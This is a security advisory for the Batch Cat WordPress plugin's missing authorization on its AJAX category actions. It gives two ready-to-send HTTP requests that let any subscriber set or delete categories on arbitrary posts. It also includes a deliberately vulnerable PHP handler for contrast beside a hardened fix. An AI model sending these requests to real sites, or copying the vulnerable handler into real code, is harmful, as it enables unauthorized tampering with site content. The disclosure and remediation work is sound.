wpexploit | Quentin VILLAIN (3wsec) | WPEX-ID: F8FDFF8A-F158-46E8-94F1-F051A6C5608B
History: Oct 05, 2021 - 12:00 a.m.

Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts

2021-10-05 00:00:00
Quentin VILLAIN (3wsec)
Tags: batch cat plugin, arbitrary categories, modification, security exploit

EPSS: 0.001 (Percentile: 24.8%)

The plugin defines 3 custom AJAX actions, all of which require authentication but none of which checks the caller's role or capabilities. As a result, any authenticated user (including simple subscribers) can add/set/delete arbitrary categories on any post.

Set the category 107 to the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_set_category&post_ids=1537&cat_ids=107


Delete the category 107 from the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_del_category&post_ids=1537&cat_ids=107
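The defect shown by the two requests above is an authorization gap: WordPress's wp_ajax_* hooks only run for logged-in users, so authentication is enforced, but nothing verifies that the caller is allowed to edit the target post. The following is an added illustrative example, not the Batch Cat plugin's own code and not a reconstruction of it: it shows that handler shape beside a hardened version that adds a nonce check, a role gate and a per-post capability check. All bcat_example_* function names, the 'bcat_action' nonce name and the request shape are assumptions; the WordPress core functions used (check_ajax_referer, current_user_can, wp_set_post_categories, wp_remove_object_terms, term_exists, wp_send_json_error) are real.

```php
<?php
// Added example (not the plugin's code). Names prefixed bcat_example_ and the
// nonce action 'bcat_action' are hypothetical; WordPress core APIs are real.

// --- Vulnerable shape (assumed, for contrast; not registered below) ---
// Reachable by every logged-in role because wp_ajax_* hooks imply only
// authentication. No nonce, no capability check, no per-post authorization.
function bcat_example_set_category_vulnerable() {
    $post_ids = array_map( 'absint', explode( ',', (string) ( $_POST['post_ids'] ?? '' ) ) );
    $cat_ids  = array_map( 'absint', explode( ',', (string) ( $_POST['cat_ids'] ?? '' ) ) );
    foreach ( $post_ids as $post_id ) {
        wp_set_post_categories( $post_id, $cat_ids ); // replaces the post's categories
    }
    wp_send_json_success();
}

// --- Shared authorization for the hardened handlers ---
// Returns array( $post_ids, $cat_ids ) or terminates the request with a JSON error.
function bcat_example_authorize_request() {
    // 1. CSRF: the admin page must emit wp_create_nonce( 'bcat_action' ) and the
    //    AJAX call must send it as '_ajax_nonce'; check_ajax_referer() dies otherwise.
    check_ajax_referer( 'bcat_action', '_ajax_nonce' );

    // 2. Coarse role gate: a bulk category tool is an editor-level feature.
    //    Subscribers and contributors fail here.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input normalisation: integers only, drop zeros/empties.
    $post_ids = array_filter( array_map( 'absint', explode( ',', (string) wp_unslash( $_POST['post_ids'] ?? '' ) ) ) );
    $cat_ids  = array_filter( array_map( 'absint', explode( ',', (string) wp_unslash( $_POST['cat_ids'] ?? '' ) ) ) );
    if ( empty( $post_ids ) || empty( $cat_ids ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // 4. Per-object authorization: the meta capability 'edit_post' resolves
    //    ownership, status and post type for each individual post.
    foreach ( $post_ids as $post_id ) {
        if ( ! current_user_can( 'edit_post', $post_id ) ) {
            wp_send_json_error( "not allowed to edit post $post_id", 403 );
        }
    }

    // 5. Referential validity: only existing category terms are accepted.
    foreach ( $cat_ids as $cat_id ) {
        if ( ! term_exists( $cat_id, 'category' ) ) {
            wp_send_json_error( "unknown category $cat_id", 400 );
        }
    }

    return array( array_values( $post_ids ), array_values( $cat_ids ) );
}

// Hardened "set": replaces the categories of each authorized post.
function bcat_example_set_category_secure() {
    list( $post_ids, $cat_ids ) = bcat_example_authorize_request();
    foreach ( $post_ids as $post_id ) {
        wp_set_post_categories( $post_id, $cat_ids );
    }
    wp_send_json_success( array( 'updated' => count( $post_ids ) ) );
}

// Hardened "delete": removes only the given categories from each authorized post.
function bcat_example_del_category_secure() {
    list( $post_ids, $cat_ids ) = bcat_example_authorize_request();
    foreach ( $post_ids as $post_id ) {
        $result = wp_remove_object_terms( $post_id, $cat_ids, 'category' );
        if ( is_wp_error( $result ) ) {
            wp_send_json_error( $result->get_error_message(), 500 );
        }
    }
    wp_send_json_success( array( 'updated' => count( $post_ids ) ) );
}

// Only the hardened handlers are registered. Using 'wp_ajax_' without a
// 'wp_ajax_nopriv_' twin keeps anonymous requests out, but that is
// authentication only; the checks in bcat_example_authorize_request()
// supply the authorization that the advisory says is missing.
add_action( 'wp_ajax_bcat_set_category', 'bcat_example_set_category_secure' );
add_action( 'wp_ajax_bcat_del_category', 'bcat_example_del_category_secure' );
```

With these checks in place, the two requests shown above from a Subscriber session fail at the nonce check (no `_ajax_nonce` is sent) and, even with a valid nonce, at the `edit_others_posts` and `edit_post` checks, returning a 403 instead of modifying post 1537. When reviewing any plugin's AJAX handlers, the pattern to look for is exactly this: a `wp_ajax_*` registration whose callback reads `$_POST` and writes to posts or terms without a `current_user_can()` call in between.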
